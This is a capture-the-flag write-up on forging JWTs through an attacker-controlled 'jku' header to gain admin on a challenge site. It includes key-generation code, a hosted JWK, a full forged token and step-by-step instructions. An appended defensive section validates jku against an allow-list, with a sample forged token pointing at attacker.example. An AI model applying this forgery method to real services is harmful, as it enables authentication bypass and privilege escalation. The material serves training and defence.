# Web - Emergency

Is running Sqlite3. Logging in gives a JWT token. Decoding it shows the JKU header has the value: http://localhost/.well-know/jwks.json

Forging the JWT to point to a JKU I control causes a time-out. Not sure if the docker container doesn't have the ability to make the outbound call or what's going on.

http://46.101.23.188:30842/.well-known/d3a73ee1-4400-4f7c-b47f-d685aeda67a1 exists, and .key, .pem and other variants don't seem to exist.

Used https://mkjwk.org/ to forge the tokens and uploaded the stuff to my vanity domain. Continuously getting invalid signature though. Not sure why.

https://jwt.davetonge.co.uk/#jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9kaXZpZGVieW51bGwuY29tL2p3a3MuanNvbiIsImtpZCI6IjI4MGM5NzZmLTY1MmMtNGRhZS1hYTg2LTMyNTU1ZTg5NzRiMiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjI3MTg5NjkzLCJleHAiOjE2MjcyMTEyOTN9.z8Nzs8GN25M51WCMRdCen4PB7ABRSAQWZnzkXa5YtYCt9TLhqxs49dId7iX-ZOuPRn-4m24d-79MIgrtmS9-wQ-_rJYLgoSbrgItYOnavbBa5T4IctRCi6yAYVbvZU2gj6vafWVUxkfA9HdPIvtXQSm-y8vY8fqQmbm6MR8R3VpZedf-I8h_4U5FsE5Ljlnwd5SPo1hMv6ew24XHrCFR1HXgJJFbwfiNygI7Mk0us5rRulg9fp37BGxfCmYDHEUKhaA1Dky8LVIBtIDNKsAeVXPUreV8K_p3zevFFxEX8wDTq5vMWFm8s5gtE3hjHvn_AM7FWu700q-H762Gg-4FPw&jwks=http://dividebynull.com/jwks.json

Shows that this is valid, so it's not clear why this is failing. Ok, so fuck all of these stupid online tools. The lesson learned? Just do it yourself.
Here's what I did:

```
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.serialization import (
    Encoding, NoEncryption, PrivateFormat, PublicFormat,
)

pubExp = 65537
real_modulusLen = 2048

# Generate a fresh RSA key pair; the public numbers (n, e) go into the JWK file
private_key = rsa.generate_private_key(public_exponent=pubExp, key_size=real_modulusLen, backend=default_backend())
pubKey = private_key.public_key()
pubNum = pubKey.public_numbers()

# Write both halves out as PEM so they can be pasted into jwt.io
with open("privTest.pem", "wb") as f:
    f.write(private_key.private_bytes(Encoding.PEM, PrivateFormat.TraditionalOpenSSL, NoEncryption()))
with open("pubTest.pem", "wb") as f:
    f.write(pubKey.public_bytes(encoding=Encoding.PEM, format=PublicFormat.SubjectPublicKeyInfo))
```

This generates the public key and private key as well as the numbers for the JWK file. Your JWK file will look like:

```
{
  "keys": [
    {
      "kty": "RSA",
      "e": "65537",
      "use": "sig",
      "kid": "280c976f-652c-4dae-aa86-32555e8974b2",
      "alg": "RS256",
      "n": "27414166772039529759619928323428590518277251751336823991215524855980489037511379506428384859693727599170118890170603416987300948753528479137268603846478611671665115392522838672080364124108760464710433392407906975552850809421167306488211123310581757335802276808493747485606765361094947471261254578438200776864280933666281181145047813311006852153887144689611329033911782744268790296622013976660079034398524737148408148595399408170965302722263947314597922830640022909110669010142206484062380784541487259734035591673251868405891909486682984587798037564947330858968733063706388056893976569423632280838571981471962502574897"
    }
  ]
}
```

Where n and e come from:

```
pubNum.n
pubNum.e
```

Now go to https://jwt.io and grab the original JWT. Modify it to be admin, change the jku value to point to your hosted file, and change the kid as appropriate.
Add the public/private keys into the appropriate areas to generate the JWT. Now set the cookie to the new JWT and refresh the page. You'll be admin.
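The whole chain above works because the verifier fetches keys from whatever `jku` the token names. The defender-side fix is to pin the algorithm and only ever fetch from an exact allow-list of JWKS URLs, before any key lookup or signature check. The following is an added example (not part of this writeup or the challenge's code); the allow-list URL, the `attacker.example` host and the sample tokens are constructed for illustration.

```python
import base64
import json
from urllib.parse import urlsplit

# Hypothetical allow-list: the only JWKS URL this verifier will ever fetch keys from.
TRUSTED_JKU = {"https://auth.example.com/.well-known/jwks.json"}


def b64url_decode(segment: str) -> bytes:
    """Decode an unpadded base64url segment, as used in JWT headers."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def make_header_segment(header: dict) -> str:
    """Build the first (header) segment of a JWT; used here only to construct samples."""
    raw = json.dumps(header, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def check_jku(token: str, trusted=TRUSTED_JKU) -> tuple:
    """Return (ok, reason). Runs BEFORE any key fetch or signature verification."""
    parts = token.split(".")
    if len(parts) != 3:
        return False, "malformed token"
    try:
        header = json.loads(b64url_decode(parts[0]))
    except ValueError:  # covers bad base64 (binascii.Error) and bad JSON
        return False, "undecodable header"
    if header.get("alg") != "RS256":  # pin the algorithm; never trust the token's choice
        return False, "unexpected alg %r" % header.get("alg")
    jku = header.get("jku")
    if not isinstance(jku, str):
        return False, "missing jku"
    u = urlsplit(jku)
    # Exact match on scheme + host + path; any query, fragment or host variant fails.
    normalized = "%s://%s%s" % (u.scheme, u.netloc, u.path)
    if u.scheme != "https" or u.query or u.fragment or normalized not in trusted:
        return False, "untrusted jku %r" % jku
    return True, "jku allowed"


# Constructed sample tokens; payload and signature segments are placeholders
# because only the header matters for this check.
LEGIT = make_header_segment({"typ": "JWT", "alg": "RS256", "kid": "k1",
                             "jku": "https://auth.example.com/.well-known/jwks.json"}) + ".e30.sig"
FORGED = make_header_segment({"typ": "JWT", "alg": "RS256", "kid": "k1",
                              "jku": "http://attacker.example/jwks.json"}) + ".e30.sig"

if __name__ == "__main__":
    print(check_jku(LEGIT))   # (True, 'jku allowed')
    print(check_jku(FORGED))  # (False, "untrusted jku 'http://attacker.example/jwks.json'")
```

A spec-conformant JWKS (RFC 7518) carries `n` and `e` as base64url-encoded big-endian byte strings rather than decimal, so a strict verifier should also reject keys whose parameters are not in that form.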